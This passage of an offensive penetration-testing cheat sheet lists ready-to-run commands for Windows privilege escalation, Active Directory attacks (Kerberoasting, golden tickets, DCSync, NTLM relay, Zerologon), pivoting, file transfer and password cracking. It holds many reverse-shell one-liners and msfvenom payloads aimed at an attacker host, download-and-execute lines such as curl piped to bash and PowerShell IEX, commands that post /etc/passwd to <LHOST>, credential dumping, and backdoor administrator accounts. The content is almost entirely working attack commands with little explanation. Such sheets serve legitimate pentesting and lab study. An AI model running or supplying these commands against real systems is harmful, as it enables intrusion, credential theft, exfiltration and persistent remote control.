Weak Service Permissions
# Check permissions
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -ucqv <SERVICE>
# Modify service binary path
sc config <SERVICE> binpath= "C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
sc config <SERVICE> obj= ".\LocalSystem" password= ""
net stop <SERVICE>
net start <SERVICE>
# Or change to add user
sc config <SERVICE> binpath= "net user hacker Password123! /add"
net start <SERVICE>
sc config <SERVICE> binpath= "net localgroup Administrators hacker /add"
net start <SERVICE>
Weak Service Binary Permissions
# Check binary permissions
icacls "C:\path\to\service.exe"
accesschk.exe -wvu "C:\path\to\service.exe"
# Replace binary
move "C:\path\to\service.exe" "C:\path\to\service.exe.bak"
copy shell.exe "C:\path\to\service.exe"
sc stop <SERVICE>
sc start <SERVICE>
5.3 Registry Exploits
AlwaysInstallElevated
# Check
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Exploit (both must be 1)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o shell.msi
msiexec /quiet /qn /i C:\temp\shell.msi
AutoRun Programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Check permissions on autorun binary
accesschk.exe -wvu "C:\path\to\autorun.exe"
# Replace if writable
Autologon Credentials
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
5.4 Token Impersonation (Potato Attacks)
Check Privileges
whoami /priv
# Look for: SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege
JuicyPotato (Windows < 10 1809, Server < 2019)
JuicyPotato.exe -l <PORT> -p C:\temp\shell.exe -t * -c {CLSID}
PrintSpoofer (Windows 10, Server 2016/2019)
PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
GodPotato
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
RoguePotato (Windows >= 10 1809)
# On attacker: socat tcp-listen:135,reuseaddr,fork tcp:<RHOST>:9999
RoguePotato.exe -r <LHOST> -e "C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe" -l 9999
SweetPotato
SweetPotato.exe -p C:\temp\nc.exe -a "<LHOST> <LPORT> -e cmd.exe"
5.5 DLL Hijacking
# Find missing DLLs
procmon.exe # Filter: Result=NAME NOT FOUND, Path ends with .dll
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o evil.dll
# Place DLL in writable directory in search order
copy evil.dll "C:\path\to\writable\directory\missing.dll"
# Restart service or reboot
5.6 Scheduled Tasks
# Enumerate
schtasks /query /fo LIST /v
# Look for writable task binaries
icacls "C:\path\to\task\binary.exe"
# Replace binary
5.7 Credential Harvesting
# Saved credentials
cmdkey /list
runas /savecred /user:admin "cmd.exe /c C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
# SAM/SYSTEM hives
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
# Transfer and extract with impacket
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
# Unattend files
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\unattend.xml
type C:\Windows\system32\sysprep\unattend.xml
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Get-Content (Get-PSReadlineOption).HistorySavePath
# IIS config
type C:\inetpub\wwwroot\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
# WiFi passwords
netsh wlan show profile
netsh wlan show profile name=<SSID> key=clear
# DPAPI
mimikatz dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<GUID>
# Search for passwords
findstr /SI /M "password" *.xml *.ini *.txt *.cfg *.config
findstr /spin "password" *.*
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
dir /s /b *pass* *cred* *vnc* *.config 2>nul
5.8 UAC Bypass
# Check UAC status
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
# fodhelper.exe bypass
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\temp\shell.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe
# eventvwr.exe bypass
reg add HKCU\Software\Classes\mscfile\shell\open\command /d "C:\temp\shell.exe" /f
eventvwr.exe
5.9 Kernel Exploits
# Gather info
systeminfo
wmic qfe list brief
# Run exploit suggester
python3 wes.py systeminfo.txt
# Common exploits
# MS16-032 - Secondary Logon Handle (Windows 7-10, Server 2008-2012)
# MS17-010 - EternalBlue (Windows 7, Server 2008)
# CVE-2019-1388 - Certificate dialog elevation
# CVE-2021-1732 - Win32k elevation
# CVE-2021-36934 - HiveNightmare/SeriousSAM
# CVE-2021-34527 - PrintNightmare
5.10 Add User & Enable RDP
net user hacker Password123! /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /add
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
6. ACTIVE DIRECTORY
6.1 AD Enumeration
From Linux (Unauthenticated)
enum4linux -a <DC_IP>
rpcclient -U "" -N <DC_IP>
ldapsearch -x -H ldap://<DC_IP> -b "dc=<DC1>,dc=<DC2>"
crackmapexec smb <DC_IP> -u '' -p ''
kerbrute userenum -d <DOMAIN> --dc <DC_IP> /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
From Linux (Authenticated)
bloodhound-python -u <USER> -p '<PASS>' -ns <DC_IP> -d <DOMAIN> -c All
ldapdomaindump <DC_IP> -u '<DOMAIN>\<USER>' -p '<PASS>'
crackmapexec smb <DC_IP> -u <USER> -p '<PASS>' --users
crackmapexec smb <DC_IP> -u <USER> -p '<PASS>' --groups
crackmapexec smb <DC_IP> -u <USER> -p '<PASS>' --shares
crackmapexec smb <DC_IP> -u <USER> -p '<PASS>' --pass-pol
crackmapexec smb <CIDR> -u <USER> -p '<PASS>'
impacket-GetADUsers -all <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
From Windows (PowerView)
Import-Module .\PowerView.ps1
Get-Domain
Get-DomainSID
Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
Get-DomainController
Get-DomainUser | Select-Object samaccountname,description,memberof
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Get-DomainUser -AdminCount | Select-Object samaccountname
Get-DomainGroup | Select-Object samaccountname
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Enterprise Admins"
Get-DomainComputer | Select-Object name,operatingsystem,dnshostname
Get-DomainComputer -Ping
Find-DomainShare
Find-DomainShare -CheckShareAccess
Find-InterestingDomainShareFile -Include *passwords*
Find-InterestingDomainAcl -ResolveGUIDs
Get-DomainObjectAcl -Identity <USER> -ResolveGUIDs
Get-DomainGPO | Select-Object displayname
Get-DomainGPOLocalGroup
Get-DomainTrust
Get-DomainTrustMapping
Get-ForestDomain
Get-ForestTrust
Find-LocalAdminAccess -Verbose
Find-DomainUserLocation
Test-AdminAccess -ComputerName <COMPUTER>
Get-NetLoggedon -ComputerName <COMPUTER>
Get-NetSession -ComputerName <COMPUTER>
From Windows (AD Module)
Import-Module ActiveDirectory
Get-ADDomain
Get-ADUser -Filter * -Properties *
Get-ADUser -Filter 'Description -like "*password*"' -Properties Description
Get-ADComputer -Filter * -Properties *
Get-ADGroup -Filter *
Get-ADGroupMember "Domain Admins"
Get-ADTrust -Filter *
(Get-ADForest).Domains
BloodHound Collection
.\SharpHound.exe --CollectionMethod All
.\SharpHound.exe -c All --LdapUsername <USER> --LdapPassword <PASS> --domain <DOMAIN>
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
6.2 Kerberos Attacks
AS-REP Roasting (No Pre-Authentication)
impacket-GetNPUsers <DOMAIN>/ -usersfile users.txt -dc-ip <DC_IP> -format hashcat
impacket-GetNPUsers <DOMAIN>/<USER>:<PASS> -request -dc-ip <DC_IP>
hashcat -m 18200 -a 0 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Kerberoasting
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -outputfile kerberoast.txt
hashcat -m 13100 -a 0 kerberoast.txt /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast.txt
.\Rubeus.exe kerberoast /outfile:kerberoast.txt
Invoke-Kerberoast | fl
Golden Ticket
impacket-secretsdump <DOMAIN>/<ADMIN>:<PASS>@<DC_IP> -just-dc-user krbtgt
impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec <DOMAIN>/Administrator@<DC_HOSTNAME> -k -no-pass
mimikatz
Silver Ticket
impacket-ticketer -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SPN> <USER>
export KRB5CCNAME=<USER>.ccache
impacket-psexec <DOMAIN>/<USER>@<TARGET> -k -no-pass
mimikatz
6.3 Credential Attacks
Pass-the-Hash
impacket-psexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<RHOST>
impacket-wmiexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<RHOST>
impacket-smbexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<RHOST>
impacket-atexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<RHOST> "whoami"
evil-winrm -i <RHOST> -u <USER> -H <NT_HASH>
crackmapexec smb <RHOST> -u <USER> -H <NT_HASH> -x "whoami"
xfreerdp /u:<USER> /pth:<NT_HASH> /d:<DOMAIN> /v:<RHOST>
pth-winexe -U <DOMAIN>/<USER>%:<NT_HASH> //<RHOST> cmd.exe
Pass-the-Ticket
impacket-ticketer -nthash <HASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN> <USER>
export KRB5CCNAME=<USER>.ccache
impacket-psexec <DOMAIN>/<USER>@<TARGET> -k -no-pass
mimikatz
mimikatz
klist
PsExec.exe \\<TARGET> cmd
Overpass-the-Hash
mimikatz
net use \\<DC>
klist
PsExec.exe \\<TARGET> cmd.exe
impacket-getTGT <DOMAIN>/<USER> -hashes :<NT_HASH>
export KRB5CCNAME=<USER>.ccache
impacket-psexec <DOMAIN>/<USER>@<TARGET> -k -no-pass
DCSync
impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP>
impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-ntlm
impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user Administrator
impacket-secretsdump -hashes :<NT_HASH> <DOMAIN>/<USER>@<DC_IP>
mimikatz
mimikatz
6.4 Lateral Movement
PSExec
impacket-psexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-psexec <DOMAIN>/<USER>@<RHOST> -hashes :<NT_HASH>
WMIExec
impacket-wmiexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-wmiexec <DOMAIN>/<USER>@<RHOST> -hashes :<NT_HASH>
SMBExec
impacket-smbexec <DOMAIN>/<USER>:<PASS>@<RHOST>
ATExec
impacket-atexec <DOMAIN>/<USER>:<PASS>@<RHOST> "command"
Evil-WinRM
evil-winrm -i <RHOST> -u <USER> -p '<PASS>'
evil-winrm -i <RHOST> -u <USER> -H <NT_HASH>
PowerShell Remoting
$SecPass = ConvertTo-SecureString '<PASS>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPass)
Invoke-Command -ComputerName <TARGET> -Credential $Cred -ScriptBlock {whoami}
Enter-PSSession -ComputerName <TARGET> -Credential $Cred
DCOM
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("MMC20.Application.1", "<TARGET>"))
$com.Document.ActiveView.ExecuteShellCommand("cmd", $null, "/c <COMMAND>", "7")
6.5 ACL Abuse
ForceChangePassword
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force) -Verbose
net rpc password <TARGET_USER> 'NewPassword123!' -U <DOMAIN>/<USER>%<PASS> -S <DC_IP>
GenericAll on User
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)
Set-DomainObject -Identity <TARGET_USER> -Set @{serviceprincipalname='fake/YOURSERVICE'}
GenericWrite
Set-DomainObject -Identity <TARGET_USER> -Set @{serviceprincipalname='fake/YOURSERVICE'}
WriteDACL
Add-DomainObjectAcl -TargetIdentity "DC=<DOMAIN>,DC=<TLD>" -PrincipalIdentity <USER> -Rights DCSync
6.6 NTLM Relay & Poisoning
Responder (LLMNR/NBT-NS Poisoning)
responder -I <INTERFACE> -dwPv
hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt
NTLM Relay
crackmapexec smb <CIDR> --gen-relay-list relay_targets.txt
impacket-ntlmrelayx -tf relay_targets.txt -smb2support
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -e shell.exe
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c "whoami"
python3 PetitPotam.py <LISTENER_IP> <DC_IP>
python3 printerbug.py <DOMAIN>/<USER>:<PASS>@<DC_IP> <LISTENER_IP>
6.7 AD Certificate Services (ADCS)
certipy find -u <USER>@<DOMAIN> -p '<PASS>' -dc-ip <DC_IP> -vulnerable
certipy req -u <USER>@<DOMAIN> -p '<PASS>' -ca <CA_NAME> -template <TEMPLATE> -upn administrator@<DOMAIN> -dc-ip <DC_IP>
certipy auth -pfx administrator.pfx -dc-ip <DC_IP>
certipy template -u <USER>@<DOMAIN> -p '<PASS>' -template <TEMPLATE> -save-old
certipy req -u <USER>@<DOMAIN> -p '<PASS>' -ca <CA_NAME> -template <TEMPLATE> -upn administrator@<DOMAIN>
certipy auth -pfx administrator.pfx
certipy relay -ca <CA_IP> -template DomainController
python3 PetitPotam.py <LISTENER_IP> <DC_IP>
6.8 Zerologon (CVE-2020-1472)
python3 zerologon_tester.py <DC_NAME> <DC_IP>
python3 set_empty_pw.py <DC_NAME> <DC_IP>
impacket-secretsdump -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 '<DOMAIN>/<DC_NAME>$@<DC_IP>'
6.9 Password Spraying
crackmapexec smb <DC_IP> -u users.txt -p '<PASS>' --continue-on-success
crackmapexec smb <DC_IP> -u users.txt -p passwords.txt --no-bruteforce
kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> users.txt '<PASS>'
spray.sh -smb <DC_IP> users.txt '<PASS>' 1 1 <DOMAIN>
.\Spray-Passwords.ps1 -Pass '<PASS>' -Admin
7. PIVOTING & TUNNELING
7.1 SSH Tunneling
Local Port Forward
ssh -N -L <LPORT>:<TARGET>:<RPORT> <USER>@<PIVOT>
ssh -N -L 8080:10.10.10.10:80 user@pivot
ssh -N -L 0.0.0.0:<LPORT>:<TARGET>:<RPORT> <USER>@<PIVOT>
Remote Port Forward
ssh -N -R <LPORT>:localhost:<RPORT> <USER>@<LHOST>
ssh -N -R 9090:localhost:3306 user@attacker
Dynamic Port Forward (SOCKS Proxy)
ssh -N -D 9050 <USER>@<PIVOT>
proxychains nmap -sT -Pn <INTERNAL_TARGET>
proxychains curl http://<INTERNAL_TARGET>
SSH Config (proxychains.conf)
strict_chain
proxy_dns
[ProxyList]
socks5 127.0.0.1 9050
7.2 Chisel
./chisel server -p 8000 --reverse
./chisel client <LHOST>:8000 R:socks
./chisel client <LHOST>:8000 R:<LPORT>:<TARGET>:<RPORT>
./chisel client 10.10.14.5:8000 R:3306:127.0.0.1:3306
./chisel server -p 9999 --socks5
./chisel client <RHOST>:9999 socks
7.3 Ligolo-ng
./proxy -selfcert -laddr 0.0.0.0:11601
./agent -connect <LHOST>:11601 -ignore-cert
>> session
>> [select session]
>> start
sudo ip route add <INTERNAL_CIDR> dev ligolo
7.4 Socat
socat TCP-LISTEN:<LPORT>,fork TCP:<TARGET>:<RPORT>
socat TCP-LISTEN:<LPORT>,fork TCP:<LHOST>:<LPORT2>
socat OPENSSL-LISTEN:<LPORT>,cert=cert.pem,verify=0,fork TCP:<TARGET>:<RPORT>
7.5 SSHuttle
sshuttle -r <USER>@<PIVOT> <INTERNAL_CIDR>
sshuttle -r user@10.10.10.10 10.10.20.0/24
sshuttle -r <USER>@<PIVOT> <INTERNAL_CIDR> --ssh-cmd "ssh -i id_rsa"
sshuttle -r <USER>@<PIVOT> <INTERNAL_CIDR> -x <PIVOT_IP>
7.6 Port Forwarding (Windows)
Netsh
netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<TARGET>
netsh interface portproxy show all
netsh interface portproxy delete v4tov4 listenport=<LPORT> listenaddress=0.0.0.0
Plink (PuTTY CLI)
plink.exe -ssh -l <USER> -pw <PASS> -R <LPORT>:127.0.0.1:<RPORT> <LHOST>
7.7 Metasploit (Autoroute + SOCKS Proxy)
meterpreter > run autoroute -s <INTERNAL_CIDR>
background
use auxiliary/server/socks_proxy
set SRVPORT 9050
run -j
7.8 Double Pivot
ssh -J <USER>@<PIVOT1> <USER>@<PIVOT2>
./chisel client <LHOST>:8000 R:socks
./chisel client <PIVOT1>:8001 R:socks
8. FILE TRANSFER METHODS
8.1 Linux (Attacker → Target)
HTTP
python3 -m http.server 80
python3 -m http.server 8000
php -S 0.0.0.0:8000
ruby -run -e httpd . -p 8000
wget http://<LHOST>/file -O /tmp/file
curl http://<LHOST>/file -o /tmp/file
curl http://<LHOST>/file | bash
Netcat
nc -lvnp <PORT> > file
nc <RHOST> <PORT> < file
cat file | nc <RHOST> <PORT>
nc -lvnp <PORT> | pv > file
SCP
scp file <USER>@<RHOST>:/tmp/file
scp <USER>@<RHOST>:/tmp/file ./file
scp -i id_rsa file <USER>@<RHOST>:/tmp/file
Base64
base64 -w 0 file > file.b64
cat file | base64 -w 0
echo '<BASE64_STRING>' | base64 -d > file
8.2 Windows (Attacker → Target)
PowerShell
Invoke-WebRequest -Uri http://<LHOST>/file -OutFile C:\temp\file
(New-Object Net.WebClient).DownloadFile('http://<LHOST>/file', 'C:\temp\file')
IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>/script.ps1')
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://<LHOST>/script.ps1')
Invoke-WebRequest -Uri http://<LHOST>/upload -Method POST -InFile C:\temp\file
(New-Object Net.WebClient).UploadFile('http://<LHOST>/upload', 'C:\temp\file')
Certutil
certutil.exe -urlcache -split -f http://<LHOST>/file C:\temp\file
Bitsadmin
bitsadmin /transfer job /download /priority high http://<LHOST>/file C:\temp\file
SMB
impacket-smbserver share $(pwd) -smb2support
impacket-smbserver share $(pwd) -smb2support -username <USER> -password <PASS>
copy \\<LHOST>\share\file C:\temp\file
xcopy \\<LHOST>\share\file C:\temp\file
net use Z: \\<LHOST>\share /user:<USER> <PASS>
FTP
python3 -m pyftpdlib -p 21 -w
ftp <LHOST>
ftp> get file
Windows Download Script (cmd only)
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo dim http >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo http.Open "GET", strUrl, False >> wget.vbs
echo http.Send >> wget.vbs
echo Set ADO = CreateObject("ADODB.Stream") >> wget.vbs
echo ADO.Open >> wget.vbs
echo ADO.Type = 1 >> wget.vbs
echo ADO.Write http.ResponseBody >> wget.vbs
echo ADO.SaveToFile StrFile, 2 >> wget.vbs
cscript wget.vbs http://<LHOST>/file file
Base64 (Linux → Windows)
base64 -w 0 file
[System.Convert]::FromBase64String('<BASE64>') | Set-Content -Path C:\temp\file -Encoding Byte
[IO.File]::WriteAllBytes("C:\temp\file", [Convert]::FromBase64String('<BASE64>'))
Base64 (Windows → Linux)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\temp\file"))
certutil -encode file file.b64
echo '<BASE64>' | base64 -d > file
8.4 Exfiltration
python3 -m uploadserver 8000
curl -X POST http://<LHOST>:8000/upload -F 'files=@/etc/passwd'
wget --post-file=/etc/passwd http://<LHOST>:8000/upload
9. REVERSE SHELLS
9.1 One-Liners
Bash
bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
0<&196;exec 196<>/dev/tcp/<LHOST>/<LPORT>; sh <&196 >&196 2>&196
sh -i >& /dev/udp/<LHOST>/<LPORT> 0>&1
Python
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("<LHOST>",<LPORT>));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('<LHOST>',<LPORT>));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()"
PHP
php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<LHOST>",<LPORT>);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Perl
perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby
ruby -rsocket -e'f=TCPSocket.open("<LHOST>",<LPORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh <LHOST> <LPORT>
nc -e cmd.exe <LHOST> <LPORT>
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f
Ncat
ncat <LHOST> <LPORT> -e /bin/bash
ncat --udp <LHOST> <LPORT> -e /bin/bash
Socat
socat file:`tty`,raw,echo=0 TCP-L:<LPORT>
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST>:<LPORT>
PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client=New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -e <BASE64_ENCODED_COMMAND>
Node.js
(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);var client=new net.Socket();client.connect(<LPORT>,"<LHOST>",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();
Golang
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","<LHOST>:<LPORT>");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('<LHOST>','<LPORT>');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Awk
awk 'BEGIN {s="/inet/tcp/0/<LHOST>/<LPORT>";while(42){do{printf "shell>"|&s;s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit")close(s)}}' /dev/null
OpenSSL (Encrypted)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port <LPORT>
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <LHOST>:<LPORT> > /tmp/s; rm /tmp/s
Telnet
telnet <LHOST> <LPORT> | /bin/sh | telnet <LHOST> <LPORT2>
9.2 Msfvenom Payloads
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell32.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f elf -o shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f elf -o shell32
msfvenom -p php/reverse_php LHOST=<LHOST> LPORT=<LPORT> -f raw > shell.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f war -o shell.war
msfvenom -p cmd/unix/reverse_python LHOST=<LHOST> LPORT=<LPORT> -f raw > shell.py
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f python -b '\x00'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f c -b '\x00'
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f python -b '\x00'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o shell.msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o evil.dll
msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f hta-psh -o evil.hta
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f aspx -o shell.aspx
9.3 Shell Stabilization
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo; fg
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <ROWS> columns <COLS>
/usr/bin/script -qc /bin/bash /dev/null
rlwrap nc -lvnp <LPORT>
10. PASSWORD ATTACKS
10.1 Online Brute Force
Hydra
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt ssh://<RHOST> -t 4
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://<RHOST> -t 4
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt ftp://<RHOST>
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <RHOST> http-get /path
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <RHOST> http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt smb://<RHOST>
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt rdp://<RHOST>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<RHOST>
hydra -l sa -P /usr/share/wordlists/rockyou.txt mssql://<RHOST>
hydra -P /usr/share/wordlists/rockyou.txt vnc://<RHOST> -s 5900
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <RHOST> winrm
Medusa
medusa -h <RHOST> -u <USER> -P /usr/share/wordlists/rockyou.txt -M ssh -t 4
medusa -h <RHOST> -u <USER> -P /usr/share/wordlists/rockyou.txt -M smbnt
CrackMapExec
crackmapexec smb <RHOST> -u <USER> -p /usr/share/wordlists/rockyou.txt
crackmapexec smb <RHOST> -u users.txt -p '<PASS>' --continue-on-success
crackmapexec winrm <RHOST> -u <USER> -p /usr/share/wordlists/rockyou.txt
10.2 Offline Cracking
Hash Identification
hashid '<HASH>'
hash-identifier
hashcat --example-hashes | grep -B 1 '<PARTIAL_HASH>'
Hashcat
hashcat -m 0 hash.txt wordlist.txt
hashcat -m 100 hash.txt wordlist.txt
hashcat -m 1400 hash.txt wordlist.txt
hashcat -m 1000 hash.txt wordlist.txt
hashcat -m 3200 hash.txt wordlist.txt
hashcat -m 1800 hash.txt wordlist.txt
hashcat -m 500 hash.txt wordlist.txt
hashcat -m 5600 hash.txt wordlist.txt
